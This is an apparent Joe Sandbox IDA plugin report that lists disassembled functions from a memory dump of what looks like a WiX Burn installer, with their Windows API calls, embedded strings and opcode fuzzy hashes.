Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLastPathTemp
String ID: Failed to get temp path.$Failed to set variant value.$variable.cpp
API String ID: 1238063741-2915113195
Opcode ID: 33c8caeb7ba1cd64204abbaee5f81955efed53e599d51cabfebd195731e6e2f7
Instruction ID: b365b32269a1b4be8feb688289010e1d04f37201304778621668a3831ab4e47e
Opcode Fuzzy Hash: 33c8caeb7ba1cd64204abbaee5f81955efed53e599d51cabfebd195731e6e2f7
Instruction Fuzzy Hash: 1501DB71F41339A7EB20EB685C06FEA73989F00710F010156FD04EB2C1EA659D0496E5

Function 000D0917 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,00094E16,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 000D0927
GetLastError.KERNEL32(?,?,00094E16,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 000D0935

Strings

procutil.cpp, xrefs: 000D0959

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLastObjectSingleWait
String ID: procutil.cpp
API String ID: 1211598281-1178289305
Opcode ID: e49b43f9a75f68e7d7affe709f25071abca7ae3047902411e48b1e7dbb4489e2
Instruction ID: 634346c2d676b3d88f102c148868a478f347e36c50583457387783b87e709a24
Opcode Fuzzy Hash: e49b43f9a75f68e7d7affe709f25071abca7ae3047902411e48b1e7dbb4489e2
Instruction Fuzzy Hash: 7E118E32E01325EBFB209BA59C087ABBBE4EF04360F124217FD19EB291D2358D0096F5

Function 000D4038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000D4315: FindFirstFileW.KERNEL32(000B8FFA,?,000002C0,00000000,00000000), ref: 000D4350
Part of subcall function 000D4315: FindClose.KERNEL32(00000000), ref: 000D435C

SetFileAttributesW.KERNEL32(000B8FFA,00000080,00000000,000B8FFA,000000FF,00000000,?,?,000B8FFA), ref: 000D4067
GetLastError.KERNEL32(?,?,000B8FFA), ref: 000D4071
DeleteFileW.KERNEL32(000B8FFA,00000000,000B8FFA,000000FF,00000000,?,?,000B8FFA), ref: 000D4090
GetLastError.KERNEL32(?,?,000B8FFA), ref: 000D409A

Strings

fileutil.cpp, xrefs: 000D40B4

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
String ID: fileutil.cpp
API String ID: 3967264933-2967768451
Opcode ID: 9f7020a35079ef5687e5fe75a6d340e25f07a05c78a464f902fc3250f7117dc3
Instruction ID: 923c10c888f17b8cc0770309aa9e9b6de4b70e844c5233105055a0b9e85df259
Opcode Fuzzy Hash: 9f7020a35079ef5687e5fe75a6d340e25f07a05c78a464f902fc3250f7117dc3
Instruction Fuzzy Hash: 68015E31A01725A7E7316AB98D08A9B7ED8EF047A1F014317FE15E6290D771CE0095F5

Function 000BD7CC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 000BD7E1
LeaveCriticalSection.KERNEL32(?), ref: 000BD826
SetEvent.KERNEL32(?,?,?,?), ref: 000BD83A

Strings

Failed to get state during job modification., xrefs: 000BD7FA
Failure while sending progress during BITS job modification., xrefs: 000BD815

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: Failed to get state during job modification.$Failure while sending progress during BITS job modification.
API String ID: 3094578987-1258544340
Opcode ID: 14bb40654e72cd5ef39d75f8e49d9e27dca8c59a58d47f958975bd6aaf12813c
Instruction ID: 4ca725eb09918a96655c8025570195e73e80461fdcc5fafdaceede4d8762ae1f
Opcode Fuzzy Hash: 14bb40654e72cd5ef39d75f8e49d9e27dca8c59a58d47f958975bd6aaf12813c
Instruction Fuzzy Hash: 54019272901625EBCB119B55D849AEEB7ACFF08731B104156E904D7600EB35FD048BE4

Function 000BDA45 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000008,?,00000000,00000000,00000000,?,000BDBB5), ref: 000BDA59
LeaveCriticalSection.KERNEL32(00000008,?,000BDBB5), ref: 000BDA9E
SetEvent.KERNEL32(?,?,000BDBB5), ref: 000BDAB2

Strings

Failure while sending progress., xrefs: 000BDA8D
Failed to get BITS job state., xrefs: 000BDA72

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: Failed to get BITS job state.$Failure while sending progress.
API String ID: 3094578987-2876445054
Opcode ID: d4835b7547841df42c1e7580f22e6f213d0b0bc1c50212e7b73adb5a3620aa0e
Instruction ID: 8e70420d071ea5e193fccd4c4b5f35c2f4c59341b71b80ae80b506d25356a1ce
Opcode Fuzzy Hash: d4835b7547841df42c1e7580f22e6f213d0b0bc1c50212e7b73adb5a3620aa0e
Instruction Fuzzy Hash: 3801DA72A05625EBC7029B55D8499AEFBA8FF08721B00021BE90997610EB38AD0087E9

Function 000BD5AF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000008,00000000,00000000,?,000BDD19,?,?,?,?,?,00000001,00000000,?), ref: 000BD5C9
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,000BDD19,?,?,?,?,?,00000001,00000000,?), ref: 000BD5D4
GetLastError.KERNEL32(?,000BDD19,?,?,?,?,?,00000001,00000000,?), ref: 000BD5E1

Strings

Failed to create BITS job complete event., xrefs: 000BD60F
bitsengine.cpp, xrefs: 000BD605

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CreateCriticalErrorEventInitializeLastSection
String ID: Failed to create BITS job complete event.$bitsengine.cpp
API String ID: 3069647169-3441864216
Opcode ID: a1df56a94f88d7186034d0af67e6c389f6921f1624e7e4414af9b7cd67fd6481
Instruction ID: 072263f4e905f9f2b31f8fcd623e526501cfcac3b72871e03f6a96fb082cee9a
Opcode Fuzzy Hash: a1df56a94f88d7186034d0af67e6c389f6921f1624e7e4414af9b7cd67fd6481
Instruction Fuzzy Hash: 59015E76601726BBE710AB6AD805A97BBD8FF49760B014127FD08D7A41E77498108BF8

Function 0009D39D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,000A6E4B,000000B8,00000000,?,00000000,75C0B390), ref: 0009D3AC
InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 0009D3BB
LeaveCriticalSection.KERNEL32(000000D0,?,000A6E4B,000000B8,00000000,?,00000000,75C0B390), ref: 0009D3D0

Strings

Engine active cannot be changed because it was already in that state., xrefs: 0009D3F3
userexperience.cpp, xrefs: 0009D3E9

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CriticalSection$CompareEnterExchangeInterlockedLeave
String ID: Engine active cannot be changed because it was already in that state.$userexperience.cpp
API String ID: 3376869089-1544469594
Opcode ID: 62dde1730baa13b03103958f0854931d83ae9f7e3838880058c771715f196f1a
Instruction ID: 3378e40c5c2864bf2ad947ffe18e4645c13c67ce93791e6de4401d0a5749543b
Opcode Fuzzy Hash: 62dde1730baa13b03103958f0854931d83ae9f7e3838880058c771715f196f1a
Instruction Fuzzy Hash: 7BF0AF76340304AFAB206FA6EC84E9773ADEB85765B00442BFA05D7240DA74E9058734

Function 000D1B28 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 000D1B53
GetLastError.KERNEL32(?,000948D4,00000001,?,?,0009444C,?,?,?,?,0009535E,?,?,?,?), ref: 000D1B62

Strings

srclient.dll, xrefs: 000D1B31
SRSetRestorePointW, xrefs: 000D1B48
srputil.cpp, xrefs: 000D1B83

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: SRSetRestorePointW$srclient.dll$srputil.cpp
API String ID: 199729137-398595594
Opcode ID: 968d8210bb8f82b7c31896c19f80db0370f4117c0b2ff9213cbc6fe62f8731c0
Instruction ID: 062738d8ee650be8a97084043c27d42a8a3fac169307f8e24b9d2963d3cbf6e4
Opcode Fuzzy Hash: 968d8210bb8f82b7c31896c19f80db0370f4117c0b2ff9213cbc6fe62f8731c0
Instruction Fuzzy Hash: B5F0D636B81725B7E73126B59C057F679808F00770F110123AE00EAB91EF6ACC40EAF1

Function 000C4897 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,000C4848,00000000,?,000C47E8,00000000,000F7CF8,0000000C,000C493F,00000000,00000002), ref: 000C48B7
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000C48CA
FreeLibrary.KERNEL32(00000000,?,?,?,000C4848,00000000,?,000C47E8,00000000,000F7CF8,0000000C,000C493F,00000000,00000002), ref: 000C48ED

Strings

mscoree.dll, xrefs: 000C48B0
CorExitProcess, xrefs: 000C48C2

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 40fc2922d68960cb81a1cab87f6622d514d216ecda13cd88a5b445fc130bc747
Instruction ID: daa1910c72a4d9757221e61d336deadfe5ae440c54d08c1986a976f7e132039a
Opcode Fuzzy Hash: 40fc2922d68960cb81a1cab87f6622d514d216ecda13cd88a5b445fc130bc747
Instruction Fuzzy Hash: E5F03C35A01218EBDB11ABA0DC19BEEBFB8EF04711F41016AF909A6190DF749A44DBA0

Function 000D937F Relevance: 7.6, APIs: 5, Instructions: 119registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000D0E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,000D5699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 000D0E52

RegCloseKey.ADVAPI32(00000001,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019,00000001,00000000,00000000,00020019,00000000,00000001), ref: 000D9457
RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019), ref: 000D9492
RegCloseKey.ADVAPI32(00000001,00000001,00020019,00000000,00000000,00000000,00000000), ref: 000D94AE
RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000), ref: 000D94BB
RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000), ref: 000D94C8

Part of subcall function 000D0B49: RegCloseKey.ADVAPI32(00000000), ref: 000D0CA0

Part of subcall function 000D0E9B: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000D9444,00000001), ref: 000D0EB3

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Close$InfoOpenQuery
String ID:
API String ID: 796878624-0
Opcode ID: 9eedb1df8ebac6ea74b55e92cbf7bcf26c7d5b84a2ceaca39885146a3f37b2ae
Instruction ID: daf7749f539a461d5b8ce6170350de05c322fe3ab8d60e1c5b1a0a4f69a0058f
Opcode Fuzzy Hash: 9eedb1df8ebac6ea74b55e92cbf7bcf26c7d5b84a2ceaca39885146a3f37b2ae
Instruction Fuzzy Hash: 2E410B72C01329BFDF11AF958D81DADFB79EF04364F1141ABE90466222C3324E519AA0

Function 000988DE Relevance: 7.6, APIs: 5, Instructions: 118stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,00098A9E,000995E7,?,000995E7,?,?,000995E7,?,?), ref: 000988FE
lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,00098A9E,000995E7,?,000995E7,?,?,000995E7,?,?), ref: 00098906
CompareStringW.KERNEL32(0000007F,?,?,?,?,00000000,?,00000000,00000000,?,?,00098A9E,000995E7,?,000995E7,?), ref: 00098955
CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,00098A9E,000995E7,?,000995E7,?), ref: 000989B7
CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,00098A9E,000995E7,?,000995E7,?), ref: 000989E4

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CompareString$lstrlen
String ID:
API String ID: 1657112622-0
Opcode ID: f6b010e769b7bde47a14f831aa820fb298b18fa17496842c49f7203f14769604
Instruction ID: 15263ac4d50993b6fe826f72b2471e3bda6c490dae4af484b68af80c936a6d92
Opcode Fuzzy Hash: f6b010e769b7bde47a14f831aa820fb298b18fa17496842c49f7203f14769604
Instruction Fuzzy Hash: FD319572601108FFDF258E58CC85ABE3FA6EB4A364F19C016F95997310C6318990EBA2

Function 000921BC Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(8007139F,00000000,?,?,00000000,00000000,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 00092202
GetLastError.KERNEL32(?,00000000,00000000,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 0009220E

Part of subcall function 00093B51: GetProcessHeap.KERNEL32(00000000,000001C7,?,000921DC,000001C7,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 00093B59
Part of subcall function 00093B51: HeapSize.KERNEL32(00000000,?,000921DC,000001C7,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 00093B60

Strings

strutil.cpp, xrefs: 00092232

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
String ID: strutil.cpp
API String ID: 3662877508-3612885251
Opcode ID: 80bbd52bc484fe9ad42424e9ba89eb4be645fad83fd4d702caf585711a2594af
Instruction ID: 18e324dbf6e9b749dd662773c48263c72d5fd0b0e1359ea4162b2bf102b99bd7
Opcode Fuzzy Hash: 80bbd52bc484fe9ad42424e9ba89eb4be645fad83fd4d702caf585711a2594af
Instruction Fuzzy Hash: F331B832601216FBEF209B69CC44AAB77D9EF45764B11422AFD15DB2A0EB31CC40A7E0

Function 0009738E Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(000952B5,WixBundleOriginalSource,?,?,000AA41D,000953B5,WixBundleOriginalSource,=S,000FAA90,?,00000000,0009533D,?,000A7587,?,?), ref: 0009739A
LeaveCriticalSection.KERNEL32(000952B5,000952B5,00000000,00000000,?,?,000AA41D,000953B5,WixBundleOriginalSource,=S,000FAA90,?,00000000,0009533D,?,000A7587), ref: 00097401

Strings

WixBundleOriginalSource, xrefs: 00097396
Failed to get value as string for variable: %ls, xrefs: 000973F0
Failed to get value of variable: %ls, xrefs: 000973D4

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls$WixBundleOriginalSource
API String ID: 3168844106-30613933
Opcode ID: 48a6a72418b076d5b87c2b4c6692fe0006cff06bb875e7915becb19a2c51a11b
Instruction ID: 5a2f3c931e106f0568f4371d366d142f669fd8823d9ab7631a5706ea939fff66
Opcode Fuzzy Hash: 48a6a72418b076d5b87c2b4c6692fe0006cff06bb875e7915becb19a2c51a11b
Instruction Fuzzy Hash: EB01B133965229FBDF225F50CC05A9E3B65DB04761F11C121FD08AA220D7369E10B7E0

Function 000BCEF5 Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,00000000,?,00000000,?,000BCEEB,00000000), ref: 000BCF10
CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,000BCEEB,00000000), ref: 000BCF1C
CloseHandle.KERNEL32(000DB508,00000000,?,00000000,?,000BCEEB,00000000), ref: 000BCF29
CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,000BCEEB,00000000), ref: 000BCF36
UnmapViewOfFile.KERNEL32(000DB4D8,00000000,?,000BCEEB,00000000), ref: 000BCF45

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseHandle$FileUnmapView
String ID:
API String ID: 260491571-0
Opcode ID: 514fd6599816ba47f91d9c7763cd8ee50bedca3f7bfff877f321f46ed34db66d
Instruction ID: f523523fb89ac750ceb617690ba28732fdd4a762c5c5ab708c6b2a79b2f9e48d
Opcode Fuzzy Hash: 514fd6599816ba47f91d9c7763cd8ee50bedca3f7bfff877f321f46ed34db66d
Instruction Fuzzy Hash: 5F01F672405B1ADFDB306FA6D890866FBEAEF50751315C87EE29652921C371A840DF90

Function 000D79CC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 000938D4: GetProcessHeap.KERNEL32(?,000001C7,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938E5
Part of subcall function 000938D4: RtlAllocateHeap.NTDLL(00000000,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938EC

SysFreeString.OLEAUT32(00000000), ref: 000D7B2C
SysFreeString.OLEAUT32(00000000), ref: 000D7B37
SysFreeString.OLEAUT32(00000000), ref: 000D7B42

Strings

atomutil.cpp, xrefs: 000D79FF

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: FreeString$Heap$AllocateProcess
String ID: atomutil.cpp
API String ID: 2724874077-4059165915
Opcode ID: 967828c7cf30743ce1e446dbfae056449f1f60b1112f5d8c3ac293fd98ecee7f
Instruction ID: 48fecc7c4b6d34b5cf4af24c5d6c8c7f5cc38801c64445fc8320298dcffdb58b
Opcode Fuzzy Hash: 967828c7cf30743ce1e446dbfae056449f1f60b1112f5d8c3ac293fd98ecee7f
Instruction Fuzzy Hash: 4751A331E0532AAFDB21DB64C854FAEB7B8EF44754F110556E908AB251EB31DE00DBB0

Function 000D85CB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 137timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 000D86D8
GetLastError.KERNEL32 ref: 000D86E2

Strings

timeutil.cpp, xrefs: 000D8706
clbcatq.dll, xrefs: 000D85E9, 000D85F4

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Time$ErrorFileLastSystem
String ID: clbcatq.dll$timeutil.cpp
API String ID: 2781989572-961924111
Opcode ID: 71233141b8f7485376a352a94cde5e8ee8a530da214e135eedaf847d6acb67db
Instruction ID: dd22cf1d139ba28b9c763230b3a5b8520b840d5eb39fca9935195e893ec0bf7c
Opcode Fuzzy Hash: 71233141b8f7485376a352a94cde5e8ee8a530da214e135eedaf847d6acb67db
Instruction Fuzzy Hash: 0241C571B40305B6EB649BB88C45FBFB7A9EF90721F14851AB901A7391DA36CE0083B5

Function 000D35A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(000002C0), ref: 000D35BE
SysAllocString.OLEAUT32(?), ref: 000D35CE
VariantClear.OLEAUT32(?), ref: 000D36AF

Strings

xmlutil.cpp, xrefs: 000D35E6

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Variant$AllocClearInitString
String ID: xmlutil.cpp
